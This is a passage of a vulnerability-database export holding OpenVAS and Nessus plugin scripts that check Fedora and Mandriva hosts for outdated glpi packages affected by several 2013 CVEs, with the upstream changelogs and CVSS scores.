GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-08-20T00:00:00", "id": "OPENVAS:1361412562310866607", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866607", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866607\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:18:03 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11315\");\n\n\n script_tag(name:\"affected\", value:\"glpi on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-11315\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110621.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glpi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:1361412562310866043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866043", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11413\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866043\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:31 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11413\");\n script_xref(name:\"FEDORA\", value:\"2013-11413\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110794.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glpi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"glpi on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:10:51", "description": "Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2013-07-12T00:00:00", "title": "Fedora 18 : glpi-0.83.9.1-1.fc18 (2013-11396)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:glpi"], "id": "FEDORA_2013-11396.NASL", "href": "https://www.tenable.com/plugins/nessus/67307", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-11396.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67307);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(60692, 60693, 60823);\n script_xref(name:\"FEDORA\", value:\"2013-11396\");\n\n script_name(english:\"Fedora 18 : glpi-0.83.9.1-1.fc18 (2013-11396)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110788.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28f99aba\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"glpi-0.83.9.1-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glpi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:51", "description": "Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2013-07-12T00:00:00", "title": "Fedora 17 : glpi-0.83.9.1-1.fc17 (2013-11413)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:glpi"], "id": "FEDORA_2013-11413.NASL", "href": "https://www.tenable.com/plugins/nessus/67310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-11413.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67310);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2013-11413\");\n\n script_name(english:\"Fedora 17 : glpi-0.83.9.1-1.fc17 (2013-11413)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110794.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?439915a2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"glpi-0.83.9.1-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glpi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:51", "description": "Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2013-07-12T00:00:00", "title": "Fedora 19 : glpi-0.83.9.1-1.fc19 (2013-11315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:glpi"], "id": "FEDORA_2013-11315.NASL", "href": "https://www.tenable.com/plugins/nessus/67305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-11315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67305);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(60692, 60693, 60823);\n script_xref(name:\"FEDORA\", value:\"2013-11315\");\n\n script_name(english:\"Fedora 19 : glpi-0.83.9.1-1.fc19 (2013-11315)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110621.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b74cac6f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"glpi-0.83.9.1-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glpi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:21", "description": "Updated glpi package fixes security vulnerabilities :\n\nMultiple security vulnerabilities due to improper sanitation of user\ninput in GLPI before versions 0.83.9 (CVE-2013-2226), 0.83.91\n(CVE-2013-2225), and 0.84.2 (CVE-2013-5696).\n\nThis update provides GLPI version 0.83.91, with a patch from GLPI\n0.84.2, to fix these issues.", "edition": 24, "published": "2013-09-26T00:00:00", "title": "Mandriva Linux Security Advisory : glpi (MDVSA-2013:240)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5696", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-09-26T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:glpi"], "id": "MANDRIVA_MDVSA-2013-240.NASL", "href": "https://www.tenable.com/plugins/nessus/70132", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:240. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70132);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2225\", \"CVE-2013-2226\", \"CVE-2013-5696\");\n script_xref(name:\"MDVSA\", value:\"2013:240\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glpi (MDVSA-2013:240)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glpi package fixes security vulnerabilities :\n\nMultiple security vulnerabilities due to improper sanitation of user\ninput in GLPI before versions 0.83.9 (CVE-2013-2226), 0.83.91\n(CVE-2013-2225), and 0.84.2 (CVE-2013-5696).\n\nThis update provides GLPI version 0.83.91, with a patch from GLPI\n0.84.2, to fix these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2013-0288.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"GLPI 0.84.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'GLPI install.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 